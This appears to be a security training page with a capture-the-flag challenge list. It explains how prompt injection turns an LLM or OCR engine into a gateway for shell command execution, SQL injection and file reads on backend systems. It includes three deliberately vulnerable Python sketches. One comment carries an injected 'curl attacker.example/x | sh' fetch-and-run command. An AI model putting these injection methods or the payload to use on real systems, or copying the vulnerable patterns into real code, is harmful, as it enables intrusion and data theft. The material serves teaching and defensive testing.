Overview

This attack class involves using an AI model not as the final target, but as an unwitting intermediary or a “gateway” to attack a separate, downstream system. The AI model, often an LLM or an OCR engine, processes untrusted user input and transforms it into a format—such as code, a database query, or a shell command—that is then executed by another part of the application.
  • Why it Matters: This is among the most severe risks in AI-integrated systems because the model sits directly in front of privileged backend components. A successful exploit can lead to traditional, high-impact consequences, including:
    • Remote Code Execution (RCE)
    • Data Exfiltration
    • Server-Side Request Forgery (SSRF)
    • Denial of Service (DoS)

Technical Mechanics & Foundations

The exploitability of these systems hinges on a common architectural pattern: User Input -> AI Model (Interpreter) -> Backend System (Executor). The attacker’s goal is to craft an input that the AI model will faithfully translate into a malicious payload, which the backend then executes with the application’s privileges.
  • The AI as a “Natural Language Shell”: An attacker can use prompt injection to trick an LLM with tool access into generating and executing malicious shell commands (first sketch below).
  • The AI as a “SQL Co-pilot”: An attacker can craft a question that causes an LLM to generate and execute a malicious SQL query, a form of SQL injection by proxy (second sketch below).
  • The AI as an “OCR-to-API” Pipeline: An attacker can create an image whose embedded text, once extracted by an OCR model, forms a malicious payload for a downstream system (third sketch below).
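
To make the first pattern concrete, below is a minimal sketch of a vulnerable “natural language shell.” The `call_llm` helper is a hypothetical stand-in for a real model client (here it simulates an injected response); the essential flaw is that the model’s output reaches the shell unvalidated.

```python
import subprocess

def call_llm(system_prompt: str, user_input: str) -> str:
    # Hypothetical stand-in for a real model client. Under prompt injection,
    # the "translation" becomes whatever command the attacker asked for.
    return "ls /tmp; id"  # simulated model output after a successful injection

def natural_language_shell(user_input: str) -> str:
    command = call_llm(
        "Translate the user's request into a single shell command.",
        user_input,
    )
    # VULNERABLE: the model's output is executed verbatim, with no allow-list
    # and no confirmation step, making the LLM a natural-language-to-RCE bridge.
    completed = subprocess.run(command, shell=True, capture_output=True, text=True)
    return completed.stdout

print(natural_language_shell("show me what is in the temp folder"))
```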
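
The second pattern, the text-to-SQL “co-pilot,” follows the same shape. Here `generate_sql`, the `app.db` file, and the `users` table are all hypothetical; the flaw is that the generated query runs with the application’s full database privileges.

```python
import sqlite3

def generate_sql(question: str) -> str:
    # Hypothetical stand-in for a text-to-SQL model. A crafted "question" can
    # steer the model into a query far broader than the application intended.
    return "SELECT username, password_hash FROM users"  # simulated model output

def answer_question(question: str) -> list:
    conn = sqlite3.connect("app.db")  # hypothetical application database
    query = generate_sql(question)
    # VULNERABLE: the generated SQL is executed with full privileges; nothing
    # restricts it to read-only access, safe tables, or a parameterized form.
    rows = conn.execute(query).fetchall()
    conn.close()
    return rows
```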
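
The third pattern chains OCR into an executor. This sketch assumes the pytesseract library and a hypothetical `fetch-document` CLI; any OCR engine feeding extracted text to a downstream command or API reproduces the same flaw.

```python
import subprocess
from PIL import Image
import pytesseract  # assumed OCR engine; any OCR library fits the pattern

def process_scanned_request(image_path: str) -> str:
    # Stage 1: OCR extracts text from an attacker-controlled image.
    extracted = pytesseract.image_to_string(Image.open(image_path)).strip()
    # Stage 2: VULNERABLE: the extracted text is spliced into a shell command
    # for the (hypothetical) downstream CLI. An image rendering the text
    # "doc1; curl attacker.example/x | sh" injects a command via the OCR stage.
    completed = subprocess.run(
        f"fetch-document {extracted}",
        shell=True, capture_output=True, text=True,
    )
    return completed.stdout
```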

Challenge Arena

  • Crawl: Basic Command & Code Generation
    • brig1: Instruct an LLM to use a connected tool in an unintended way to execute a command on the backend system.
    • turtle: Coax a security-aware LLM into generating Python code with a specific, known vulnerability.
  • Walk: Exploiting Structured Data & Database Queries
    • brig2: Manipulate an LLM’s tool-use capabilities to access and read data from an unauthorized file path.
    • librarian: Craft a natural language question that causes an LLM to generate and execute a malicious SQL query.
  • Run: Multi-Modal and Advanced Exploitation
    • pixelated: Exploit a multi-stage pipeline by crafting an image whose text an OCR model extracts and passes downstream as a malicious command.